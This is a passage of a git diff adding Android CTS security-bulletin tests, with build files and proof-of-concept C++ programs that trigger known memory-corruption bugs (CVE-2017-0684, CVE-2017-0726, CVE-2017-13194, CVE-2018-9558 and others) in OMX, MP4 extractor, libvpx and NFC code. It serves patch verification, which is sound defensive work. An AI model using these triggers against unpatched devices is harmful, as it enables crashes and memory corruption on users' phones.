+ memcpy(&sContext.blob[offset], gStartValues, gNumStartValues);
+ offset += gNumStartValues;
+ for (count = 0; count < REPEATVALUES; ++count) {
+ memcpy(&sContext.blob[offset], gRepeatValues, gNumRepeatValues);
+ offset += gNumRepeatValues;
+ }
+ memcpy(&sContext.blob[offset], gLastValues, gNumLastValues);
+ offset += gNumLastValues;
+ sContext.readPos = 0;
+ private->m_read_fn = ReadHandler;
+ private->m_user_data = (void*)&sContext;
+ private->m_user_data_length = sContext.blobSize;
+ private->m_free_user_data_fn = NULL;
+ codec = opj_j2k_create_decompress();
+ opj_set_default_event_handler(&eventMgr);
+ opj_j2k_read_header(private,codec,&image,&eventMgr);
+ opj_free(sContext.blob);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp
new file mode 100644
index 0000000..ac348c8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2017-0684",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_omxutils",
+ ],
+ shared_libs: [
+ "libstagefright",
+ "libbinder",
+ "libmedia_omx",
+ "libutils",
+ "liblog",
+ "libui",
+ "libstagefright_foundation",
+ "libcutils",
+ "libhidlbase",
+ "libhidlmemory",
+ "android.hidl.allocator@1.0",
+ "android.hardware.media.omx@1.0",
+ ],
+ include_dirs: [
+ "frameworks/native/include/media/openmax",
+ "frameworks/av/media/libstagefright",
+ "frameworks/native/include/media/hardware",
+ ],
+ compile_multilib: "32",
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp
new file mode 100644
index 0000000..9b76c7b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp
@@ -0,0 +1,139 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/omxUtils.h"
+
+sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
+
+int allocateHidlPortBuffers(OMX_U32 portIndex,
+ Vector<Buffer> *buffers) {
+ buffers->clear();
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ int err = omxUtilsGetParameter(portIndex, &def);
+ omxExitOnError(err);
+ for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
+ Buffer buffer;
+ buffer.mFlags = 0;
+ bool success;
+ auto transStatus = mAllocator->allocate(def.nBufferSize,
+ [&success, &buffer](
+ bool s,
+ hidl_memory const& m) {
+ success = s;
+ buffer.mHidlMemory = m;
+ });
+ omxExitOnError(!transStatus.isOk());
+ omxExitOnError(!success);
+ omxUtilsUseBuffer(portIndex, buffer.mHidlMemory, &buffer.mID);
+ buffers->push(buffer);
+ }
+ return OK;
+}
+
+int main() {
+
+ /* Initialize OMX for the specified codec */
+ status_t ret = omxUtilsInit((char *) "OMX.google.h264.encoder");
+ omxExitOnError(ret);
+ /* Get OMX input port parameters */
+ OMX_PARAM_PORTDEFINITIONTYPE *params =
+ (OMX_PARAM_PORTDEFINITIONTYPE *) malloc(
+ sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+ int ipBufferCount = params->nBufferCountActual;
+ /* Set port mode */
+ omxUtilsSetPortMode(OMX_UTILS_IP_PORT, IOMX::kPortModeDynamicANWBuffer);
+ /* Allocate input buffers and graphic buffer */
+ sp<GraphicBuffer> graphicbuffer = new GraphicBuffer(
+ params->format.video.nFrameWidth, params->format.video.nFrameHeight,
+ HAL_PIXEL_FORMAT_RGBX_8888,
+ android::GraphicBuffer::USAGE_HW_VIDEO_ENCODER, "me");
+ int i;
+ Vector<Buffer> inputBuffers;
+ Vector<Buffer> outputBuffers;
+ /* Register input buffers with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers);
+ /* Get OMX output port parameters */
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_OP_PORT, params);
+ int opBufferSize = params->nBufferSize;
+ int opBufferCount = params->nBufferCountActual;
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers);
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State chage to Executing */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+ /* Empty input buffers and fill output buffers */
+ OMXBuffer omxIpBuf(graphicbuffer);
+ omxUtilsEmptyBuffer(inputBuffers[0].mID, omxIpBuf, 0, 0, -1);
+ OMXBuffer omxOpBuf(0, opBufferSize);
+ omxUtilsFillBuffer(outputBuffers[0].mID, omxOpBuf, -1);
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State chage to Loaded */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+ /* Free input and output buffers */
+ for (i = 0; i < ipBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mID);
+ }
+ for (i = 0; i < opBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mID);
+ }
+ /*********************************************************************/
+ /* Following code exposes vulnerability */
+ /*********************************************************************/
+ Vector<Buffer> newInputBuffers;
+ Vector<Buffer> newOutputBuffers;
+ /* Get OMX input port parameters, change settings and set output port*/
+ /* port parameters */
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+ params->nBufferSize = 38016;
+ params->format.video.nFrameWidth = 2000;
+ params->format.video.nFrameHeight = 2000;
+ omxUtilsSetParameter(OMX_UTILS_IP_PORT, params);
+ /* Allocated input buffers and register with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &newInputBuffers);
+ /* Allocated output buffers and register with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &newOutputBuffers);
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State chage to Executing */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+ /* Empty input buffers and fill output buffers */
+ OMXBuffer newOmxIpBuf(graphicbuffer);
+ omxUtilsEmptyBuffer(newInputBuffers[0].mID, newOmxIpBuf, 0, 0, -1);
+ OMXBuffer newOmxOpBuf(0, opBufferSize);
+ omxUtilsFillBuffer(newOutputBuffers[0].mID, newOmxOpBuf, -1);
+ /* Do OMX State change to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State change to Loaded */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+ /* Free input and output buffers */
+ for (i = 0; i < ipBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, newInputBuffers[i].mID);
+ }
+ for (i = 0; i < opBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, newOutputBuffers[i].mID);
+ }
+ /* Free OMX resources */
+ omxUtilsFreeNode();
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp
new file mode 100644
index 0000000..5eb1556
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2017-0726",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils_track",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include",
+ ],
+ shared_libs: [
+ "libdatasource",
+ "libstagefright",
+ "libstagefright_foundation",
+ "libutils",
+ "liblog",
+ ],
+ cflags: [
+ "-DCHECK_MEMORY_LEAK",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp
new file mode 100644
index 0000000..ea6935f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp
@@ -0,0 +1,143 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "stdlib.h"
+
+#include "../includes/memutils_track.h"
+#include <android/IMediaExtractor.h>
+#include <datasource/DataSourceFactory.h>
+#include <dlfcn.h>
+#include <media/DataSource.h>
+#include <media/IMediaHTTPService.h>
+#include <media/stagefright/DataSourceBase.h>
+#include <media/stagefright/MediaExtractor.h>
+#include <media/stagefright/MetaData.h>
+
+unsigned char mp4_data[] = {
+ 0x00, 0x00, 0x00, 0x1C, 0x66, 0x74, 0x79, 0x70, 0x6D, 0x70, 0x34, 0x32,
+ 0x00, 0x00, 0x00, 0x00, 0x6D, 0x70, 0x34, 0x32, 0x64, 0x62, 0x79, 0x31,
+ 0x69, 0x73, 0x6F, 0x6D, 0x00, 0x00, 0x00, 0x74, 0x6D, 0x6F, 0x6F, 0x76,
+ 0x00, 0x00, 0x00, 0x6C, 0x75, 0x64, 0x74, 0x61, 0x00, 0x00, 0x00, 0x64,
+ 0x6D, 0x65, 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x58,
+ 0x69, 0x6C, 0x73, 0x74, 0x00, 0x00, 0x00, 0x50, 0x2D, 0x2D, 0x2D, 0x2D,
+ 0x00, 0x00, 0x00, 0x1C, 0x6D, 0x65, 0x61, 0x6E, 0x00, 0x00, 0x00, 0x00,
+ 0x63, 0x6F, 0x6D, 0x2E, 0x61, 0x70, 0x70, 0x6C, 0x65, 0x2E, 0x69, 0x54,
+ 0x75, 0x6E, 0x65, 0x73, 0x00, 0x00, 0x00, 0x14, 0x6E, 0x61, 0x6D, 0x65,
+ 0x00, 0x00, 0x00, 0x00, 0x69, 0x54, 0x75, 0x6E, 0x53, 0x4D, 0x50, 0x42,
+ 0x00, 0x08, 0x00, 0x18, 0x64, 0x61, 0x74, 0x61, 0x33, 0x32, 0x20, 0x34,
+ 0x20, 0x33, 0x20, 0x32, 0x33, 0x32, 0x20, 0x34, 0x20, 0x33, 0x20, 0x32};
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmp4extractor.so"
+#define LIBNAME_APEX "/apex/com.android.media/lib/extractors/libmp4extractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmp4extractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmp4extractor.so"
+#endif
+
+#define TOTAL_SIZE 524432
+#define DATA_SIZE 144
+#define TRACK_SIZE (TOTAL_SIZE - DATA_SIZE + 16 + 1)
+#define TMP_FILE "/data/local/tmp/temp_cve_2017_0726"
+
+char enable_selective_overload = ENABLE_NONE;
+using namespace android;
+
+bool is_tracking_required(size_t size) { return (size == TRACK_SIZE); }
+
+int main() {
+ GetExtractorDef getDef = nullptr;
+ FILE *fp = fopen(TMP_FILE, "wb");
+ if (!fp) {
+ return EXIT_FAILURE;
+ }
+
+ char zero_array[TOTAL_SIZE - DATA_SIZE];
+ memset(zero_array, 0, (TOTAL_SIZE - DATA_SIZE) * sizeof(char));
+
+ /* Write mp4 stream */
+ fwrite(mp4_data, 1, DATA_SIZE, fp);
+
+ /* Append 0's to create custom PoC */
+ fwrite(zero_array, 1, (TOTAL_SIZE - DATA_SIZE), fp);
+ fclose(fp);
+
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+ }
+
+ getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource =
+ DataSourceFactory::getInstance()->CreateFromURI(NULL, TMP_FILE);
+ if (dataSource == nullptr) {
+ dlclose(libHandle);
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ void *creator = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+ float confidence;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ creator = (void *)getDef().u.v2.sniff(dataSource->wrap(), &confidence,
+ &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ creator = (void *)getDef().u.v3.sniff(dataSource->wrap(), &confidence,
+ &meta, &freeMeta);
+ }
+ if (!creator) {
+ dlclose(libHandle);
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+
+ CMediaExtractor *ret = ((CreatorFunc)creator)(dataSource->wrap(), meta);
+ if (ret == nullptr) {
+ dlclose(libHandle);
+ remove(TMP_FILE);
+ return EXIT_FAILURE;
+ }
+
+ if (meta != nullptr && freeMeta != nullptr) {
+ freeMeta(meta);
+ }
+
+ sp<MetaData> metaData = new MetaData();
+ MediaExtractorCUnwrapper *mediaExtractorCUnwrapper =
+ new MediaExtractorCUnwrapper(ret);
+ enable_selective_overload = ENABLE_MALLOC_CHECK;
+ mediaExtractorCUnwrapper->getTrackMetaData(*metaData.get(), 0, 1);
+ enable_selective_overload = ENABLE_NONE;
+
+ remove(TMP_FILE);
+ dlclose(libHandle);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
index a3a00ea..7d36722 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
@@ -43,10 +43,6 @@
"android.hidl.allocator@1.0",
"android.hardware.media.omx@1.0",
],
- suffix: "32",
- },
- lib64: {
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp
new file mode 100644
index 0000000..52e76a5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2017-13194",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ shared_libs: [
+ "liblog",
+ ],
+ include_dirs: [
+ "external/libvpx/libvpx",
+ "external/libvpx/libvpx/vpx_ports",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp
new file mode 100644
index 0000000..f11cac9
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp
@@ -0,0 +1,127 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include "../includes/memutils.h"
+#include "vpx/vp8cx.h"
+#include "vpx/vpx_codec.h"
+#include "vpx/vpx_encoder.h"
+
+#define ENCODE_WIDTH 11
+#define ENCODE_HEIGHT 10000
+#define LIBNAME "/system/apex/com.android.media.swcodec/lib64/libvpx.so"
+#define LIBNAME_APEX "/apex/com.android.media.swcodec/lib64/libvpx.so"
+
+char enable_selective_overload = ENABLE_NONE;
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+ vpx_codec_err_t codec_return = VPX_CODEC_OK;
+ vpx_codec_enc_cfg_t mCodecConfiguration;
+ vpx_image_t raw_frame;
+ uint32_t framerate = (30 << 16);
+ vpx_codec_iface_t *(*func_ptr1)() =
+ (vpx_codec_iface_t * (*)()) dlsym(libHandle, "vpx_codec_vp8_cx");
+ if (!func_ptr1) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_iface_t *mCodecInterface = (*func_ptr1)();
+ if (!mCodecInterface) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_err_t (*func_ptr2)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int) =
+ (vpx_codec_err_t(*)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int))dlsym(
+ libHandle, "vpx_codec_enc_config_default");
+ if (!func_ptr2) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ codec_return = (*func_ptr2)(mCodecInterface, &mCodecConfiguration, 0);
+ mCodecConfiguration.g_w = ENCODE_WIDTH;
+ mCodecConfiguration.g_h = ENCODE_HEIGHT;
+ vpx_codec_ctx_t mCodecContext;
+ vpx_codec_err_t (*func_ptr3)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *,
+ vpx_codec_flags_t, int) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *,
+ vpx_codec_flags_t, int))dlsym(libHandle, "vpx_codec_enc_init_ver");
+ if (!func_ptr3) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ codec_return = (*func_ptr3)(&mCodecContext, mCodecInterface, &mCodecConfiguration, 0,
+ VPX_ENCODER_ABI_VERSION);
+
+ if (codec_return != VPX_CODEC_OK) {
+ return EXIT_FAILURE;
+ }
+ unsigned char *source = (unsigned char *)memalign(16, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2));
+ if (!source) {
+ return EXIT_FAILURE;
+ }
+ memset(source, 0, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2));
+ vpx_image_t (*func_ptr4)(vpx_image_t *, vpx_img_fmt_t, unsigned int, unsigned int, unsigned int,
+ unsigned char *) =
+ (vpx_image(*)(vpx_image *, vpx_img_fmt, unsigned int, unsigned int, unsigned int,
+ unsigned char *))dlsym(libHandle, "vpx_img_wrap");
+ if (!func_ptr4) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ (*func_ptr4)(&raw_frame, VPX_IMG_FMT_I420, ENCODE_WIDTH, ENCODE_HEIGHT, 1, source);
+ vpx_codec_err_t (*func_ptr5)(vpx_codec_ctx_t *, const vpx_image_t *, vpx_codec_pts_t,
+ unsigned long, vpx_enc_frame_flags_t, unsigned long) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx *, const vpx_image *, long, unsigned long, long,
+ unsigned long))dlsym(libHandle, "vpx_codec_encode");
+ if (!func_ptr5) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ codec_return =
+ (*func_ptr5)(&mCodecContext, &raw_frame, framerate,
+ (uint32_t)(((uint64_t)1000000 << 16) / framerate), 0, VPX_DL_REALTIME);
+ if (codec_return != VPX_CODEC_OK) {
+ free(source);
+ return EXIT_FAILURE;
+ }
+ vpx_codec_err_t (*func_ptr6)(vpx_codec_ctx_t *) =
+ (vpx_codec_err_t(*)(vpx_codec_ctx *))dlsym(libHandle, "vpx_codec_destroy");
+ if (!func_ptr6) {
+ dlclose(libHandle);
+ free(source);
+ return EXIT_FAILURE;
+ }
+ (*func_ptr6)(&mCodecContext);
+ enable_selective_overload = ENABLE_NONE;
+ dlclose(libHandle);
+ free(source);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp
new file mode 100644
index 0000000..7226414
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2018-9558",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ include_dirs: [
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/gki/ulinux",
+ "system/nfc/src/include",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp
new file mode 100644
index 0000000..e20c0f2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include <stdlib.h>
+
+#include <nfc_api.h>
+#include <rw_int.h>
+
+#define INITIAL_VALUE 0xBE
+#define NUM_BYTES 1
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void rw_t2t_handle_rsp(uint8_t *p_data);
+
+void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) {
+ (void)event;
+ (void)p_rw_data;
+}
+
+int main() {
+ tRW_T2T_CB *p_t2t = &rw_cb.tcb.t2t;
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+ p_t2t->state = RW_T2T_STATE_DETECT_TLV;
+ p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
+ p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
+ p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
+ p_t2t->bytes_count = NUM_BYTES;
+ p_t2t->tlv_value[1] = UINT8_MAX;
+ uint8_t *base_ptr = (uint8_t *)(p_t2t->lockbyte + RW_T1T_MAX_LOCK_BYTES);
+ memset((void *)base_ptr, INITIAL_VALUE, sizeof(tRW_T1T_LOCK));
+ uint8_t data[T2T_READ_DATA_LEN];
+ rw_t2t_handle_rsp(data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp
new file mode 100644
index 0000000..821444a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2018-9561",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp
new file mode 100644
index 0000000..6c4ccf2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include "llcp_api.h"
+
+#define DEFAULT_VALUE 0x06
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_STATUS llcp_util_parse_connect(uint8_t* p_bytes, uint16_t length,
+ tLLCP_CONNECTION_PARAMS* p_params);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
